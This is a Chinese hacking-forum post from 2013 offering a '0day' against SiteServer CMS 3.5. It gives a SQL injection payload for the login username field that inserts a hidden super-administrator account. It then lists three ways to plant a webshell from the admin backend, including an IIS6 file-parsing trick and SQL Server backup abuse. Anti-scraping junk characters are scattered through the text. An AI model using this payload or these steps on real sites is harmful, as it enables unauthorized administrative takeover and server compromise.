找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2265|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版6 w1 c" {" }7 P

. E6 T2 C( q6 R2 m* _, ostieserver官网:www.siteserver.cn! f5 ?  Q! {- d" C
' @4 R; L4 X( \4 H) B

2 @) ?( Q( i7 i4 s* i+ H% r6 ?) c& {! R* _) h) o. ~5 J+ j: C
EXP:
% o2 a% B; a- t- }3 K/ G0 K1 |
: L4 Q+ q* c$ Q- l5 ]直接访问UserCenter/login.aspx
% x. E+ ?2 `+ ^2 n) A* m
' k$ u+ w" h& m# ]& H# x
! M" q( e) b/ h$ Z- V+ P* D0 p; [5 P7 l% `, H
用户名处输入:6 z' Z1 t5 I; r# _( x; D+ I2 P( w
% c! w$ t8 J" J& Q
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
: a. L+ P; `/ f8 I( S! M, Q
0 u3 e8 ]: N; m4 T  c , e: W9 d$ M9 {' A) |

" m1 Z1 x3 _% l/ a密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
" e! Q! c; [2 {7 e# b) P& a! H5 c. R9 ]" ?! r+ e' R% B3 n! ]4 N% z7 M

% @8 x9 N# [: E
7 z1 s; U/ {3 I之后再访问后台SiteServer/login.aspx用插入的用户登陆
9 k5 h7 R0 c# F' K* F- q
& ^1 n" n  f' V7 x! R* S 9 W- X& M% u+ H! L- F

- v8 @8 \0 P# |9 n后台拿webshell的三种方法:
# o% r- p* `, n2 R
1 A4 x9 c8 s( Y3 {% [  O! |2 l" h; i1 j一、8 m! u8 A) c1 J* ]; ]

- E' `5 q( a: ^+ ]站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx7 w$ Y. Y6 R0 X% R' A( x% }

" s0 h1 I; j( f0 t二、
" Q3 {- X& b6 V% S# o& m5 S! L8 H+ ~$ w' N# e& Q
成员权限-》添加用户-》用户名为:1.asp. W# ^" B- h2 x& ]7 s" Z

) V3 |  T' f3 b4 J0 jhttp://127.0.0.1/usercenter/' `: a8 i& e9 u- Z7 |2 {/ ]7 l. F

+ O9 s" D. `( g) g用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
& S# R, S+ ]$ |: T# w6 y( _% `  S/ _4 n2 D) c' F  Z
(ps:后台添加用户时不会验证是否含有非法字符)2 Y3 _5 j; r6 w
5 E7 b% V( [( K4 o4 i
三、
0 v9 ^) [. L$ i/ d5 x' [  N  k% ~4 [+ T% o
系统工具-》实用工具-》机器参数查看( f' v& w6 p9 y
可以看到数据库类型、名称,WEB路径3 B/ W7 e9 m1 H6 |) ~

3 F+ w1 Y- T7 g9 t5 n系统工具-》数据库工具-》SQL语句查询
% b  Y3 Z# r. G8 y) j" L0 e这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。: h. I( J- q7 Z% g, [8 S  B$ q9 ?

$ l5 [) S5 k( s" q' }9 _
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表